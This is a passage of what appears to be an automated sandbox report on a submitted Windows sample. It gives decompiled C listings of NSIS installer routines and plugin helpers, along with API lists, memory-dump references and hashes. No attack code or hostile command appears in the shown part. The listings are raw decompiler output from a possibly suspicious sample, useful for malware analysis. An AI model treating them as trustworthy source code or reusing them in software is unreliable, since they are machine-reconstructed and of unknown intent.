                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                				short _v132;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x414eb8; // 0x4af63
                                                					_t11 =  *0x420ec4;
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextW(_a4,  &_v132);
                                                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                				}
                                                				return 0;
                                                			}






                                                0x00402fa3
                                                0x00402fb1
                                                0x00402fb7
                                                0x00402fb7
                                                0x00402fc5
                                                0x00402fc7
                                                0x00402fcd
                                                0x00402fd4
                                                0x00402fd6
                                                0x00402fd6
                                                0x00402fec
                                                0x00402ffc
                                                0x0040300e
                                                0x0040300e
                                                0x00403016

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                • MulDiv.KERNEL32(0004AF63,00000064,?), ref: 00402FDC
                                                • wsprintfW.USER32 ref: 00402FEC
                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                • SetDlgItemTextW.USER32 ref: 0040300E
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                                                • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E6EB82655() {
                                                				intOrPtr _t24;
                                                				void* _t26;
                                                				intOrPtr _t27;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                				void* _t45;
                                                
                                                				_t40 = E6EB812BB();
                                                				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                				do {
                                                					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                					}
                                                					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                					if(_t39 <= 7) {
                                                						switch( *((intOrPtr*)(_t39 * 4 +  &M6EB82784))) {
                                                							case 0:
                                                								 *_t40 = 0;
                                                								goto L17;
                                                							case 1:
                                                								__eax =  *__eax;
                                                								if(__ecx > __ebx) {
                                                									 *(__esp + 0x10) = __ecx;
                                                									__ecx =  *(0x6eb8407c + __edx * 4);
                                                									__edx =  *(__esp + 0x10);
                                                									__ecx = __ecx * __edx;
                                                									asm("sbb edx, edx");
                                                									__edx = __edx & __ecx;
                                                									__eax = __eax &  *(0x6eb8409c + __edx * 4);
                                                								}
                                                								_push(__eax);
                                                								goto L15;
                                                							case 2:
                                                								__eax = E6EB81510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L16;
                                                							case 3:
                                                								__ecx =  *0x6eb8506c;
                                                								__edx = __ecx - 1;
                                                								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                								__eax =  *0x6eb8506c;
                                                								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                								goto L17;
                                                							case 4:
                                                								__eax = lstrcpynW(__edi,  *__eax,  *0x6eb8506c);
                                                								goto L17;
                                                							case 5:
                                                								_push( *0x6eb8506c);
                                                								_push(__edi);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								goto L17;
                                                							case 6:
                                                								_push( *__esi);
                                                								L15:
                                                								__eax = wsprintfW(__edi, 0x6eb85000);
                                                								L16:
                                                								__esp = __esp + 0xc;
                                                								goto L17;
                                                						}
                                                					}
                                                					L17:
                                                					_t26 =  *(_t43 + 0x14);
                                                					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                						GlobalFree(_t26);
                                                					}
                                                					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(_t27 != 0) {
                                                						if(_t27 != 0xffffffff) {
                                                							if(_t27 > 0) {
                                                								E6EB81381(_t27 - 1, _t40);
                                                								goto L26;
                                                							}
                                                						} else {
                                                							E6EB81312(_t40);
                                                							L26:
                                                						}
                                                					}
                                                					_t44 = _t44 - 1;
                                                					_t43 = _t43 - 0x20;
                                                				} while (_t44 >= 0);
                                                				return GlobalFree(_t40);
                                                			}











                                                0x6eb8265f
                                                0x6eb82661
                                                0x6eb82665
                                                0x6eb82674
                                                0x6eb82678
                                                0x6eb8267d
                                                0x6eb8267d
                                                0x6eb82685
                                                0x6eb8268c
                                                0x6eb82692
                                                0x00000000
                                                0x6eb82699
                                                0x00000000
                                                0x00000000
                                                0x6eb826a1
                                                0x6eb826a5
                                                0x6eb826a8
                                                0x6eb826ac
                                                0x6eb826b3
                                                0x6eb826b7
                                                0x6eb826bd
                                                0x6eb826bf
                                                0x6eb826c1
                                                0x6eb826c1
                                                0x6eb826c8
                                                0x00000000
                                                0x00000000
                                                0x6eb826d1
                                                0x00000000
                                                0x00000000
                                                0x6eb826d8
                                                0x6eb826de
                                                0x6eb826e8
                                                0x6eb826ee
                                                0x6eb826f3
                                                0x00000000
                                                0x00000000
                                                0x6eb82714
                                                0x00000000
                                                0x00000000
                                                0x6eb826fa
                                                0x6eb82700
                                                0x6eb82701
                                                0x6eb82703
                                                0x00000000
                                                0x00000000
                                                0x6eb8271c
                                                0x6eb8271e
                                                0x6eb82724
                                                0x6eb8272a
                                                0x6eb8272a
                                                0x00000000
                                                0x00000000
                                                0x6eb82692
                                                0x6eb8272d
                                                0x6eb8272d
                                                0x6eb82732
                                                0x6eb82743
                                                0x6eb82743
                                                0x6eb82749
                                                0x6eb8274e
                                                0x6eb82753
                                                0x6eb8275f
                                                0x6eb82764
                                                0x00000000
                                                0x6eb82769
                                                0x6eb82755
                                                0x6eb82756
                                                0x6eb8276a
                                                0x6eb8276a
                                                0x6eb82753
                                                0x6eb8276b
                                                0x6eb8276c
                                                0x6eb8276f
                                                0x6eb82783

                                                APIs
                                                  • Part of subcall function 6EB812BB: GlobalAlloc.KERNELBASE(00000040,?,6EB812DB,?,6EB8137F,00000019,6EB811CA,-000000A0), ref: 6EB812C5
                                                • GlobalFree.KERNEL32 ref: 6EB82743
                                                • GlobalFree.KERNEL32 ref: 6EB82778
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 86a1b7e058ae9e8fc7f1e5a7e60b6d705a574d29114f98571da26d3269695f70
                                                • Instruction ID: 75cfb89ac03c8b6af83a113f3fd2bc4eadf95b805026ae4b04b73027738c5bb9
                                                • Opcode Fuzzy Hash: 86a1b7e058ae9e8fc7f1e5a7e60b6d705a574d29114f98571da26d3269695f70
                                                • Instruction Fuzzy Hash: 9F31CD75504582EFCB168FE6C994C6F7FBAFB973047144929F28297320C731AC068B62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00402950(int __ebx, void* __eflags) {
                                                				WCHAR* _t26;
                                                				void* _t29;
                                                				long _t37;
                                                				int _t49;
                                                				void* _t52;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t59;
                                                				void* _t60;
                                                				void* _t61;
                                                
                                                				_t49 = __ebx;
                                                				_t52 = 0xfffffd66;
                                                				_t26 = E00402DA6(0xfffffff0);
                                                				_t55 = _t26;
                                                				 *(_t61 - 0x40) = _t26;
                                                				if(E00405E4D(_t26) == 0) {
                                                					E00402DA6(0xffffffed);
                                                				}
                                                				E00405FD2(_t55);
                                                				_t29 = E00405FF7(_t55, 0x40000000, 2);
                                                				 *(_t61 + 8) = _t29;
                                                				if(_t29 != 0xffffffff) {
                                                					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                					if( *(_t61 - 0x28) != _t49) {
                                                						_t37 =  *0x42a234;
                                                						 *(_t61 - 0x44) = _t37;
                                                						_t54 = GlobalAlloc(0x40, _t37);
                                                						if(_t54 != _t49) {
                                                							E004034AF(_t49);
                                                							E00403499(_t54,  *(_t61 - 0x44));
                                                							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                							 *(_t61 - 0x10) = _t59;
                                                							if(_t59 != _t49) {
                                                								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                								while( *_t59 != _t49) {
                                                									_t60 = _t59 + 8;
                                                									 *(_t61 - 0x3c) =  *_t59;
                                                									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                									_t59 = _t60 +  *(_t61 - 0x3c);
                                                								}
                                                								GlobalFree( *(_t61 - 0x10));
                                                							}
                                                							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                							GlobalFree(_t54);
                                                							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                						}
                                                					}
                                                					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                					CloseHandle( *(_t61 + 8));
                                                				}
                                                				_t56 = 0xfffffff3;
                                                				if(_t52 < _t49) {
                                                					_t56 = 0xffffffef;
                                                					DeleteFileW( *(_t61 - 0x40));
                                                					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                				}
                                                				_push(_t56);
                                                				E00401423();
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
                                                				return 0;
                                                			}













                                                0x00402950
                                                0x00402952
                                                0x00402957
                                                0x0040295c
                                                0x0040295f
                                                0x00402969
                                                0x0040296d
                                                0x0040296d
                                                0x00402973
                                                0x00402980
                                                0x00402988
                                                0x0040298b
                                                0x00402997
                                                0x0040299a
                                                0x004029a0
                                                0x004029ae
                                                0x004029b3
                                                0x004029b7
                                                0x004029ba
                                                0x004029c3
                                                0x004029cf
                                                0x004029d3
                                                0x004029d6
                                                0x004029e0
                                                0x004029ff
                                                0x004029ec
                                                0x004029f4
                                                0x004029f7
                                                0x004029fc
                                                0x004029fc
                                                0x00402a06
                                                0x00402a06
                                                0x00402a13
                                                0x00402a19
                                                0x00402a1f
                                                0x00402a1f
                                                0x004029b7
                                                0x00402a33
                                                0x00402a35
                                                0x00402a35
                                                0x00402a3f
                                                0x00402a40
                                                0x00402a44
                                                0x00402a48
                                                0x00402a4e
                                                0x00402a4e
                                                0x00402a55
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32 ref: 00402A06
                                                • GlobalFree.KERNEL32 ref: 00402A19
                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
                                                • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                                • Opcode Fuzzy Hash: 7b0c029b9c5e7e6b8388003f1156d4aabb8cb2de0a1768ee69b2a829e4763d50
                                                • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E6EB81979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v76;
                                                				void _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				signed int _t61;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t69;
                                                				void* _t70;
                                                				void* _t71;
                                                				signed int _t77;
                                                				void* _t81;
                                                				signed int _t83;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t101;
                                                
                                                				_t85 = __edx;
                                                				 *0x6eb8506c = _a8;
                                                				_t77 = 0;
                                                				 *0x6eb85070 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E6EB812E3();
                                                				_t90 = E6EB813B1(_t42);
                                                				_t87 = _t85;
                                                				_t81 = E6EB812E3();
                                                				_a8 = _t81;
                                                				_t45 =  *_t81;
                                                				if(_t45 != 0x7e && _t45 != 0x21) {
                                                					_a16 = E6EB812E3();
                                                					_t77 = E6EB813B1(_t74);
                                                					_v12 = _t85;
                                                					GlobalFree(_a16);
                                                					_t81 = _a8;
                                                				}
                                                				_t46 =  *_t81 & 0x0000ffff;
                                                				_t101 = _t46 - 0x2f;
                                                				if(_t101 > 0) {
                                                					_t47 = _t46 - 0x3c;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags > 0) {
                                                								L56:
                                                								_t48 = 0;
                                                								__eflags = 0;
                                                								L57:
                                                								asm("cdq");
                                                								L58:
                                                								_t90 = _t48;
                                                								_t87 = _t85;
                                                								L59:
                                                								E6EB81510(_t85, _t90, _t87,  &_v76);
                                                								E6EB81312( &_v76);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L49:
                                                								__eflags = 0;
                                                								L50:
                                                								_t48 = 1;
                                                								goto L57;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 < _t77) {
                                                								goto L49;
                                                							}
                                                							goto L56;
                                                						}
                                                						_t85 = _t87;
                                                						_t48 = E6EB83050(_t90, _t77, _t85);
                                                						goto L58;
                                                					}
                                                					_t57 = _t47 - 1;
                                                					__eflags = _t57;
                                                					if(_t57 == 0) {
                                                						__eflags = _t90 - _t77;
                                                						if(_t90 != _t77) {
                                                							goto L56;
                                                						}
                                                						__eflags = _t87 - _v12;
                                                						if(_t87 != _v12) {
                                                							goto L56;
                                                						}
                                                						goto L49;
                                                					}
                                                					_t58 = _t57 - 1;
                                                					__eflags = _t58;
                                                					if(_t58 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L56;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L49;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 <= _t77) {
                                                								goto L56;
                                                							}
                                                							goto L49;
                                                						}
                                                						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                						_t85 = _t87;
                                                						_t59 = _t90;
                                                						_t83 = _t77;
                                                						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                							_t48 = E6EB83070(_t59, _t83, _t85);
                                                						} else {
                                                							_t48 = E6EB830A0(_t59, _t83, _t85);
                                                						}
                                                						goto L58;
                                                					}
                                                					_t60 = _t58 - 0x20;
                                                					__eflags = _t60;
                                                					if(_t60 == 0) {
                                                						_t90 = _t90 ^ _t77;
                                                						_t87 = _t87 ^ _v12;
                                                						goto L59;
                                                					}
                                                					_t61 = _t60 - 0x1e;
                                                					__eflags = _t61;
                                                					if(_t61 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                							_t90 = _t90 | _t77;
                                                							_t87 = _t87 | _v12;
                                                							goto L59;
                                                						}
                                                						__eflags = _t90 | _t87;
                                                						if((_t90 | _t87) != 0) {
                                                							goto L49;
                                                						}
                                                						__eflags = _t77 | _v12;
                                                						if((_t77 | _v12) != 0) {
                                                							goto L49;
                                                						}
                                                						goto L56;
                                                					}
                                                					__eflags = _t61 == 0;
                                                					if(_t61 == 0) {
                                                						_t90 =  !_t90;
                                                						_t87 =  !_t87;
                                                					}
                                                					goto L59;
                                                				}
                                                				if(_t101 == 0) {
                                                					L21:
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) != 0) {
                                                						_v24 = E6EB82EE0(_t90, _t87, _t77, _v12);
                                                						_v20 = _t85;
                                                						_t48 = E6EB82F90(_t90, _t87, _t77, _v12);
                                                						_t81 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t48 = _t90;
                                                						_t85 = _t87;
                                                					}
                                                					__eflags =  *_t81 - 0x2f;
                                                					if( *_t81 != 0x2f) {
                                                						goto L58;
                                                					} else {
                                                						_t90 = _v24;
                                                						_t87 = _v20;
                                                						goto L59;
                                                					}
                                                				}
                                                				_t67 = _t46 - 0x21;
                                                				if(_t67 == 0) {
                                                					_t48 = 0;
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) != 0) {
                                                						goto L57;
                                                					}
                                                					goto L50;
                                                				}
                                                				_t68 = _t67 - 4;
                                                				if(_t68 == 0) {
                                                					goto L21;
                                                				}
                                                				_t69 = _t68 - 1;
                                                				if(_t69 == 0) {
                                                					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                					if( *((short*)(_t81 + 2)) != 0x26) {
                                                						_t90 = _t90 & _t77;
                                                						_t87 = _t87 & _v12;
                                                						goto L59;
                                                					}
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) == 0) {
                                                						goto L56;
                                                					}
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) == 0) {
                                                						goto L56;
                                                					}
                                                					goto L49;
                                                				}
                                                				_t70 = _t69 - 4;
                                                				if(_t70 == 0) {
                                                					_t48 = E6EB82EA0(_t90, _t87, _t77, _v12);
                                                					goto L58;
                                                				} else {
                                                					_t71 = _t70 - 1;
                                                					if(_t71 == 0) {
                                                						_t90 = _t90 + _t77;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t71 == 0) {
                                                							_t90 = _t90 - _t77;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L59;
                                                				}
                                                			}





























                                                0x6eb81979
                                                0x6eb81983
                                                0x6eb8198c
                                                0x6eb8198f
                                                0x6eb81994
                                                0x6eb8199d
                                                0x6eb819a6
                                                0x6eb819a8
                                                0x6eb819af
                                                0x6eb819b1
                                                0x6eb819b4
                                                0x6eb819bb
                                                0x6eb819c9
                                                0x6eb819d2
                                                0x6eb819d7
                                                0x6eb819da
                                                0x6eb819e0
                                                0x6eb819e0
                                                0x6eb819e3
                                                0x6eb819e6
                                                0x6eb819e9
                                                0x6eb81ab1
                                                0x6eb81ab1
                                                0x6eb81ab4
                                                0x6eb81b34
                                                0x6eb81b39
                                                0x6eb81b48
                                                0x6eb81b4b
                                                0x6eb81b53
                                                0x6eb81b53
                                                0x6eb81b53
                                                0x6eb81b55
                                                0x6eb81b55
                                                0x6eb81b56
                                                0x6eb81b56
                                                0x6eb81b58
                                                0x6eb81b5a
                                                0x6eb81b60
                                                0x6eb81b69
                                                0x6eb81b7a
                                                0x6eb81b85
                                                0x6eb81b85
                                                0x6eb81b4d
                                                0x6eb81b2f
                                                0x6eb81b2f
                                                0x6eb81b31
                                                0x6eb81b31
                                                0x00000000
                                                0x6eb81b31
                                                0x6eb81b4f
                                                0x6eb81b51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81b51
                                                0x6eb81b3d
                                                0x6eb81b41
                                                0x00000000
                                                0x6eb81b41
                                                0x6eb81ab6
                                                0x6eb81ab6
                                                0x6eb81ab7
                                                0x6eb81b26
                                                0x6eb81b28
                                                0x00000000
                                                0x00000000
                                                0x6eb81b2a
                                                0x6eb81b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81b2d
                                                0x6eb81ab9
                                                0x6eb81ab9
                                                0x6eb81aba
                                                0x6eb81af7
                                                0x6eb81afc
                                                0x6eb81b19
                                                0x6eb81b1c
                                                0x00000000
                                                0x00000000
                                                0x6eb81b1e
                                                0x00000000
                                                0x00000000
                                                0x6eb81b20
                                                0x6eb81b22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81b24
                                                0x6eb81afe
                                                0x6eb81b03
                                                0x6eb81b05
                                                0x6eb81b07
                                                0x6eb81b09
                                                0x6eb81b12
                                                0x6eb81b0b
                                                0x6eb81b0b
                                                0x6eb81b0b
                                                0x00000000
                                                0x6eb81b09
                                                0x6eb81abc
                                                0x6eb81abc
                                                0x6eb81abf
                                                0x6eb81af0
                                                0x6eb81af2
                                                0x00000000
                                                0x6eb81af2
                                                0x6eb81ac1
                                                0x6eb81ac1
                                                0x6eb81ac4
                                                0x6eb81ad7
                                                0x6eb81adc
                                                0x6eb81ae9
                                                0x6eb81aeb
                                                0x00000000
                                                0x6eb81aeb
                                                0x6eb81ade
                                                0x6eb81ae0
                                                0x00000000
                                                0x00000000
                                                0x6eb81ae2
                                                0x6eb81ae5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81ae7
                                                0x6eb81ac7
                                                0x6eb81ac8
                                                0x6eb81ace
                                                0x6eb81ad0
                                                0x6eb81ad0
                                                0x00000000
                                                0x6eb81ac8
                                                0x6eb819ef
                                                0x6eb81a68
                                                0x6eb81a6a
                                                0x6eb81a6d
                                                0x6eb81a8b
                                                0x6eb81a8e
                                                0x6eb81a94
                                                0x6eb81a99
                                                0x6eb81a6f
                                                0x6eb81a6f
                                                0x6eb81a73
                                                0x6eb81a77
                                                0x6eb81a79
                                                0x6eb81a79
                                                0x6eb81a9c
                                                0x6eb81aa0
                                                0x00000000
                                                0x6eb81aa6
                                                0x6eb81aa6
                                                0x6eb81aa9
                                                0x00000000
                                                0x6eb81aa9
                                                0x6eb81aa0
                                                0x6eb819f1
                                                0x6eb819f4
                                                0x6eb81a59
                                                0x6eb81a5b
                                                0x6eb81a5d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81a63
                                                0x6eb819f6
                                                0x6eb819f9
                                                0x00000000
                                                0x00000000
                                                0x6eb819fb
                                                0x6eb819fc
                                                0x6eb81a32
                                                0x6eb81a37
                                                0x6eb81a4f
                                                0x6eb81a51
                                                0x00000000
                                                0x6eb81a51
                                                0x6eb81a39
                                                0x6eb81a3b
                                                0x00000000
                                                0x00000000
                                                0x6eb81a41
                                                0x6eb81a44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81a4a
                                                0x6eb819fe
                                                0x6eb81a01
                                                0x6eb81a28
                                                0x00000000
                                                0x6eb81a03
                                                0x6eb81a03
                                                0x6eb81a04
                                                0x6eb81a18
                                                0x6eb81a1a
                                                0x6eb81a06
                                                0x6eb81a08
                                                0x6eb81a0e
                                                0x6eb81a10
                                                0x6eb81a10
                                                0x6eb81a08
                                                0x00000000
                                                0x6eb81a04

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 22db28b41a80977cfa58ea39196a1dd946c8654bb49dcaa5c5d22fd5581535a1
                                                • Instruction ID: cb45ff6133b3bbdc51d03580a432cfd13399830ec0fe7845edab57f3ec420135
                                                • Opcode Fuzzy Hash: 22db28b41a80977cfa58ea39196a1dd946c8654bb49dcaa5c5d22fd5581535a1
                                                • Instruction Fuzzy Hash: AD51D132D1618AAE8B409FE9C4406EFBFB9EB41314F08855AD534B3314E771EA8E8791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E6EB82480(void* __edx) {
                                                				void* _t37;
                                                				signed int _t38;
                                                				void* _t39;
                                                				void* _t41;
                                                				signed char* _t42;
                                                				signed char* _t51;
                                                				void* _t52;
                                                				void* _t54;
                                                
                                                				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                				while(1) {
                                                					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                					_t52 = _t51[0x18];
                                                					if(_t52 == 0) {
                                                						goto L9;
                                                					}
                                                					_t41 = 0x1a;
                                                					if(_t52 == _t41) {
                                                						goto L9;
                                                					}
                                                					if(_t52 != 0xffffffff) {
